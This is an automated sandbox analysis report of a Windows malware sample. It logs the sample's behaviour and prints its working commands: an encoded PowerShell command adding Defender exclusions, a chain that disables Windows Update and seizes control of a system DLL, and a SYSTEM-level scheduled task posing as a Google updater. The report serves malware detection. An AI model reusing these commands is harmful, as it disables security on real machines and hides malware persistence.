Analysis
-
max time kernel
306s -
max time network
324s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
10-05-2022 22:15
Static task
static1
Behavioral task
behavioral1
Sample
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
Resource
win7-20220414-en
General
-
Target
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
-
Size
2.0MB
-
MD5
79dbc1a54d33366681f1e926d565cad4
-
SHA1
907cf0ec6784bf140f9759d6931d3697da0fc229
-
SHA256
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
-
SHA512
6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 4936 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exepid process 3700 icacls.exe 3864 icacls.exe 4832 takeown.exe 1384 takeown.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exepid process 1384 takeown.exe 3700 icacls.exe 3864 icacls.exe 4832 takeown.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 4568 set thread context of 4924 4568 conhost.exe conhost.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1876 reg.exe 5104 reg.exe 2600 reg.exe 4984 reg.exe 2884 reg.exe 5092 reg.exe 2144 reg.exe 1892 reg.exe 2860 reg.exe 3500 reg.exe 2488 reg.exe 4688 reg.exe 4084 reg.exe 4844 reg.exe 4976 reg.exe 4880 reg.exe 3344 reg.exe 1920 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepid process 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 3952 conhost.exe 516 powershell.exe 516 powershell.exe 516 powershell.exe 4568 conhost.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
powershell.execonhost.exeschtasks.exepowershell.execonhost.exetakeown.exedescription pid process Token: SeDebugPrivilege 4452 powershell.exe Token: SeIncreaseQuotaPrivilege 4452 powershell.exe Token: SeSecurityPrivilege 4452 powershell.exe Token: SeTakeOwnershipPrivilege 4452 powershell.exe Token: SeLoadDriverPrivilege 4452 powershell.exe Token: SeSystemProfilePrivilege 4452 powershell.exe Token: SeSystemtimePrivilege 4452 powershell.exe Token: SeProfSingleProcessPrivilege 4452 powershell.exe Token: SeIncBasePriorityPrivilege 4452 powershell.exe Token: SeCreatePagefilePrivilege 4452 powershell.exe Token: SeBackupPrivilege 4452 powershell.exe Token: SeRestorePrivilege 4452 powershell.exe Token: SeShutdownPrivilege 4452 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeSystemEnvironmentPrivilege 4452 powershell.exe Token: SeRemoteShutdownPrivilege 4452 powershell.exe Token: SeUndockPrivilege 4452 powershell.exe Token: SeManageVolumePrivilege 4452 powershell.exe Token: 33 4452 powershell.exe Token: 34 4452 powershell.exe Token: 35 4452 powershell.exe Token: 36 4452 powershell.exe Token: SeDebugPrivilege 3952 conhost.exe Token: SeTakeOwnershipPrivilege 1384 schtasks.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeAssignPrimaryTokenPrivilege 516 powershell.exe Token: SeIncreaseQuotaPrivilege 516 powershell.exe Token: SeSecurityPrivilege 516 powershell.exe Token: SeTakeOwnershipPrivilege 516 powershell.exe Token: SeLoadDriverPrivilege 516 powershell.exe Token: SeSystemtimePrivilege 516 powershell.exe Token: SeBackupPrivilege 516 powershell.exe Token: SeRestorePrivilege 516 powershell.exe Token: SeShutdownPrivilege 516 powershell.exe Token: SeSystemEnvironmentPrivilege 516 powershell.exe Token: SeUndockPrivilege 516 powershell.exe Token: SeManageVolumePrivilege 516 powershell.exe Token: SeDebugPrivilege 4568 conhost.exe Token: SeTakeOwnershipPrivilege 4832 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.execonhost.execmd.execmd.execmd.execmd.exeservices.exedescription pid process target process PID 3220 wrote to memory of 3952 3220 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe conhost.exe PID 3220 wrote to memory of 3952 3220 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe conhost.exe PID 3220 wrote to memory of 3952 3220 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe conhost.exe PID 3952 wrote to memory of 4464 3952 conhost.exe cmd.exe PID 3952 wrote to memory of 4464 3952 conhost.exe cmd.exe PID 4464 wrote to memory of 4452 4464 cmd.exe powershell.exe PID 4464 wrote to memory of 4452 4464 cmd.exe powershell.exe PID 3952 wrote to memory of 2992 3952 conhost.exe cmd.exe PID 3952 wrote to memory of 2992 3952 conhost.exe cmd.exe PID 2992 wrote to memory of 4120 2992 cmd.exe sc.exe PID 2992 wrote to memory of 4120 2992 cmd.exe sc.exe PID 2992 wrote to memory of 5112 2992 cmd.exe sc.exe PID 2992 wrote to memory of 5112 2992 cmd.exe sc.exe PID 2992 wrote to memory of 4828 2992 cmd.exe sc.exe PID 2992 wrote to memory of 4828 2992 cmd.exe sc.exe PID 2992 wrote to memory of 3080 2992 cmd.exe sc.exe PID 2992 wrote to memory of 3080 2992 cmd.exe sc.exe PID 2992 wrote to memory of 1972 2992 cmd.exe sc.exe PID 2992 wrote to memory of 1972 2992 cmd.exe sc.exe PID 2992 wrote to memory of 4984 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4984 2992 cmd.exe reg.exe PID 2992 wrote to memory of 1876 2992 cmd.exe reg.exe PID 2992 wrote to memory of 1876 2992 cmd.exe reg.exe PID 2992 wrote to memory of 2884 2992 cmd.exe reg.exe PID 2992 wrote to memory of 2884 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4084 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4084 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4844 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4844 2992 cmd.exe reg.exe PID 3952 wrote to memory of 3536 3952 conhost.exe cmd.exe PID 3952 wrote to memory of 3536 3952 conhost.exe cmd.exe PID 2992 wrote to memory of 1384 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 1384 2992 cmd.exe schtasks.exe PID 3536 wrote to memory of 4720 3536 cmd.exe schtasks.exe PID 3536 wrote to memory of 4720 3536 cmd.exe schtasks.exe PID 2992 wrote to memory of 3700 2992 cmd.exe icacls.exe PID 2992 wrote to memory of 3700 2992 cmd.exe icacls.exe PID 3952 wrote to memory of 3736 3952 conhost.exe cmd.exe PID 3952 wrote to memory of 3736 3952 conhost.exe cmd.exe PID 3736 wrote to memory of 4440 3736 cmd.exe schtasks.exe PID 3736 wrote to memory of 4440 3736 cmd.exe schtasks.exe PID 2992 wrote to memory of 3344 2992 cmd.exe reg.exe PID 2992 wrote to memory of 3344 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4880 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4880 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4976 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4976 2992 cmd.exe reg.exe PID 2992 wrote to memory of 5092 2992 cmd.exe reg.exe PID 2992 wrote to memory of 5092 2992 cmd.exe reg.exe PID 2992 wrote to memory of 4540 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 4540 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 3320 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 3320 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 4328 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 4328 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 4068 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 4068 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 1780 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 1780 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 3248 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 3248 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 4380 2992 cmd.exe schtasks.exe PID 2992 wrote to memory of 4380 2992 cmd.exe schtasks.exe PID 4936 wrote to memory of 4568 4936 services.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
-
C:\Windows\system32\sc.exesc stop bits1⤵
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"1⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="3⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "dycqfudelnyzo"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE1⤵
-
